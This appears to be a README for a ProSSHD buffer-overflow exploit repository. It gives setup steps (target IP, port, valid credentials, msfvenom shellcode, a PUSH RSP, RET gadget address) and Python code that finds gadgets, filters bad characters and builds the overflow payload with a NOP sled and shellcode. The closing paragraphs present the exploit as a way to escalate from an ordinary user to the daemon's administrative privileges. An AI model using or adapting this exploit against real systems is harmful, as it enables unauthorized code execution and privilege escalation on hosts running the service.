An exploit for the buffer overflow (BoF) vulnerability that was present in ProSSHD.
- You will need to change some variables' values (IP, Port, User, Password, and Shellcode), and most likely the memory address for the ROP gadget.
- Shellcode can be generated with msfvenom, or write your own if you're bored and have a lot of time on your hands.
- IP and Port need to be changed to the IP of the host running ProSSHD and the port the service listens on.
- User and Password need to be the credentials of a valid user on the SSH service.
- The memory address depends on which gadget you want to use; PUSH RSP, RET worked for me. Ropper or any other gadget-finding tool will turn one up. The address is specific to the ProSSHD build and where its module is loaded, so check it against your own copy of the binary rather than trusting the one in the script.
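As an added illustration (this is not the repository's exploit code), the following Python shows the two steps the list above leaves to the reader: locating a PUSH RSP, RET gadget by its byte encoding, the way Ropper does, and laying the overflow out so that control lands on the shellcode. The module image, load base, offset to the saved return address and shellcode are constructed placeholders, not values taken from ProSSHD.

```python
import struct

# Encoding of the gadget named above: push rsp = 0x54, ret = 0xC3.
# 32-bit push esp; ret is the same two bytes, so one pattern covers both.
PUSH_SP_RET = b"\x54\xc3"

# Bytes a string-style copy of a username/password will usually terminate on or mangle.
DEFAULT_BAD = b"\x00\x0a\x0d"


def find_gadgets(image, image_base, pattern=PUSH_SP_RET):
    """Return every virtual address at which `pattern` occurs in a loaded image.

    This is the core of what a gadget finder does: a raw byte search over the
    module, with each hit converted to an address using the module's load base.
    The search deliberately ignores instruction boundaries, because a usable
    gadget can start in the middle of a longer instruction.
    """
    addrs = []
    pos = image.find(pattern)
    while pos != -1:
        addrs.append(image_base + pos)
        pos = image.find(pattern, pos + 1)
    return addrs


def bad_chars_in(data, bad=DEFAULT_BAD):
    """Return the set of forbidden byte values that appear in `data`."""
    return {b for b in data if b in bad}


def pick_gadget(addrs, width, bad=DEFAULT_BAD):
    """First address whose little-endian encoding carries no bad byte, else None."""
    fmt = "<Q" if width == 8 else "<I"
    for addr in addrs:
        if not bad_chars_in(struct.pack(fmt, addr), bad):
            return addr
    return None


def build_payload(offset, gadget_addr, shellcode, width, nop_len=16, bad=DEFAULT_BAD):
    """Lay out the overflow string:

        [junk up to the saved return address][gadget address][NOP sled][shellcode]

    When the vulnerable function returns, the instruction pointer becomes the
    gadget address and the stack pointer points at the bytes right after it.
    push rsp; ret then transfers control to exactly that spot, so the sled and
    shellcode must follow the address immediately.
    """
    fmt = "<Q" if width == 8 else "<I"
    packed = struct.pack(fmt, gadget_addr)
    for name, blob in (("gadget address", packed), ("shellcode", shellcode)):
        found = bad_chars_in(blob, bad)
        if found:
            raise ValueError(f"{name} contains bad chars: {sorted(found)}")
    return b"A" * offset + packed + b"\x90" * nop_len + shellcode


# Constructed stand-in for a loaded module: int3 filler with the gadget planted
# at two made-up offsets. Base and offsets are assumptions for the demo only.
DEMO_BASE = 0x10010000
DEMO_IMAGE = bytearray(b"\xcc" * 0x2000)
DEMO_IMAGE[0x0100:0x0102] = PUSH_SP_RET   # address 0x10010100: encodes with a 0x00 byte
DEMO_IMAGE[0x1234:0x1236] = PUSH_SP_RET   # address 0x10011234: clean
DEMO_IMAGE = bytes(DEMO_IMAGE)

# Placeholder shellcode (four int3s); substitute msfvenom output here.
DEMO_SHELLCODE = b"\xcc" * 4
DEMO_OFFSET = 492   # assumed distance to the saved return address; measure yours


def demo(width=4):
    """Select a clean gadget from the demo image and build the payload."""
    gadget = pick_gadget(find_gadgets(DEMO_IMAGE, DEMO_BASE), width)
    return gadget, build_payload(DEMO_OFFSET, gadget, DEMO_SHELLCODE, width)


if __name__ == "__main__":
    g, p = demo()
    print(f"gadget at {g:#x}, payload length {len(p)}")
```

The demo packs the address as 4 bytes. With 8-byte packing the same address is rejected, because the high bytes of any canonical user-space x64 address are zero: if the real target really is 64-bit, whether the overflowing copy tolerates those nulls is the first thing to verify in a debugger.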
Now, when you think about what's going on here, you might wonder "isn't it kind of dumb?", because you have to be authenticated, or at least hold valid credentials for the target machine, for this to work. So if you already have access, why would you want to gain access?
The answer is two-fold.
First, I enjoy this. Writing software is great, but making exploits? I live for this stuff, so this was great practice. Second, an administrative user would have had to start the ProSSHD daemon, so the shellcode runs with that user's privileges rather than those of the account you logged in with. If you have creds for some ordinary John Doe, this right here would be your ticket to the big leagues.